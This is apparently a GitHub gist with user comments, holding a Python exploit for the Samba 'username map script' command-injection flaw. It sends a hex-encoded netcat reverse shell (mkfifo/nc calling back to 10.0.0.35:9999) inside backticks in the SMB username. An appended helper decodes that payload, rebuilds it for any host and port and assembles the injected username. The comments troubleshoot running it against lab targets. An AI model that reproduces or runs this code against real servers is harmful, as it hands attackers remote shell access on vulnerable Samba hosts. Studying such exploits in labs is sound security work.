@joenorton8014
Created August 19, 2017 12:35
#!/usr/bin/python
# Runs under Python 2 and Python 3: the print statement was the only
# Python-2-only construct, so it is written as a function here.
from __future__ import print_function
import sys
from smb.SMBConnection import SMBConnection
from smb import smb_structs

# Talk SMB1 only; pysmb would otherwise try to negotiate SMB2.
smb_structs.SUPPORT_SMB2 = False

# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html

# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print("\nUsage: " + sys.argv[0] + " <HOST>\n")
    sys.exit()

# Shellcode. It is not binary code but a plain shell command (mkfifo + nc
# reverse shell back to LHOST:LPORT), hex-escaped by msfvenom:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"

# Samba hands the username to its "username map script" through a shell,
# so the backticks run the command; nohup keeps it alive after the SMB
# session is torn down.
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU", "METASPLOITABLE", use_ntlm_v2 = False)

# connect() returns the authentication result. Logging in with this bogus
# username is expected to fail, so a False here does not mean the payload
# did not run: the command has already been executed by the time Samba
# rejects the logon. Check the listener on LPORT instead of asserting here.
result = conn.connect(sys.argv[1], 445)
print("SMB session attempted, auth result: %r (check your listener on LPORT)" % result)
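The payload the gist sends is not machine code but a shell command placed in the SMB username; Samba's `username map script` passes the username through a shell and the backticks execute it. The helpers below are an added example, not part of the gist: they decode the msfvenom hex buffer above back into the netcat reverse-shell command, rebuild the same command for a different LHOST/LPORT without re-running msfvenom, parse both the old `buf = ""` and the newer `buf = b""` forms of `msfvenom -f python` output (the bytes-versus-str mismatch people hit on Python 3 in the comments), and assemble the username string while rejecting characters that would break the backtick substitution. The function names, the fifo default and the constructed msfvenom sample are assumptions of this example.

```python
#!/usr/bin/env python3
# Added example (not part of the gist): build and inspect the username payload.
# Function names and the constructed sample below are this example's own.
import re

# The hex buffer exactly as pasted in the gist (msfvenom -f python, str form).
GIST_BUF = (
    "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
    "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
    "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
    "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
    "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
    "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
    "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
    "\x20"
)

# Constructed sample of what newer msfvenom prints (bytes literals); payload "id".
SAMPLE_MSFVENOM_BYTES_FORM = r'''buf =  b""
buf += b"\x69\x64"
'''


def decode_msfvenom_buf(buf):
    """cmd/unix/* payloads are plain ASCII, so the hex escapes decode to the
    shell command itself. Accept the str form (older msfvenom) and the bytes
    form (newer msfvenom); the latter is why a Python 3 port of the gist
    needs buf.decode()."""
    if isinstance(buf, bytes):
        return buf.decode("ascii")
    return buf


def parse_msfvenom_python(text):
    """Parse the 'buf = ""' / 'buf += b"\\x.."' lines of msfvenom -f python
    output into the command string; both literal prefixes are accepted."""
    hexdigits = []
    for m in re.finditer(r'buf\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"', text):
        hexdigits.append(m.group(1).replace("\\x", ""))
    return bytes.fromhex("".join(hexdigits)).decode("ascii")


def netcat_reverse_shell(lhost, lport, fifo="/tmp/kbgaf"):
    """Rebuild the mkfifo/nc pipeline that cmd/unix/reverse_netcat generates,
    so LHOST/LPORT can be changed without re-running msfvenom."""
    return "mkfifo {f}; nc {h} {p} 0<{f} | /bin/sh >{f} 2>&1; rm {f} ".format(
        f=fifo, h=lhost, p=int(lport))


def build_username(cmd):
    """Wrap a command the way the gist does: '/=' then a backtick substitution
    under nohup. A backtick inside cmd would close the substitution early and
    a newline would split the shell command line, so both are rejected."""
    if "`" in cmd or "\n" in cmd:
        raise ValueError("command must not contain backticks or newlines")
    return "/=`nohup " + cmd + "`"


if __name__ == "__main__":
    print("gist payload decodes to:", repr(decode_msfvenom_buf(GIST_BUF)))
    print("username for 10.0.0.35:9999:",
          build_username(netcat_reverse_shell("10.0.0.35", 9999)))
```

Decoding the gist's buffer makes the LHOST/LPORT question in the comments concrete: the listener address is baked into the `nc 10.0.0.35 9999` text of the payload, so changing the listener means regenerating that string, not changing anything about port 445 on the target.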
@cybertuxh4xor

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

@WorksWellWithOthers commented Mar 26, 2022

Could you please clarify how the code is going to recognize the RHOST IP or the URL?

The command-line argument passed when calling this script sets the RHOST IP:
assert conn.connect(sys.argv[1], 445)

Running this on the command line generates a new shellcode for you to replace the variable buf with. The LHOST is declared there.
msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

@WorksWellWithOthers

help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

Do you have a listener running at port 445?

Try running a listener before attempting this script:
nc -nvlp 445

@polaris430

Folks using msf6: make sure LHOST = the tun0 interface IP address, else it won't work.

@anonedez

hello dear friends, please help me :)

python SambaExploit.py 10.0.2.12
Traceback (most recent call last):
File "/root/Desktop/SambaExploit.py", line 39, in
assert conn.connect(sys.argv[1], 445)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/smb/SMBConnection.py", line 120, in connect
self.sock = socket.create_connection(( ip, port ), timeout = timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 851, in create_connection
raise exceptions[0]
File "/usr/lib/python3.11/socket.py", line 836, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

What should I do?

@anonedez

Folks using msf6: make sure LHOST = the tun0 interface IP address, else it won't work.

Okay bro, what can I do?

@ghost-ng

That error just says you can't connect to the target: either the target is offline or it is not responding on that port.

@anonedez

To run this script successfully, follow the steps below:
1- sudo pip install pysmb
2- Add parentheses to the print function because we will use Python 3, so it will look like this: print("\nUsage: " + sys.argv[0] + " <HOST>\n")
3- Since we can't concatenate str (not "bytes") to str, we will decode our bytes in line 38 and then concatenate, so it will look like this: username = "/=`nohup " + buf.decode + "`"

help please

@ghost-ng

@anonedez

Like I said above, use Python 2 to avoid making these modifications.

How can I use python 2? I am new to cyber security. This is why I don't understand much.

@anonedez commented Feb 10, 2024 via email
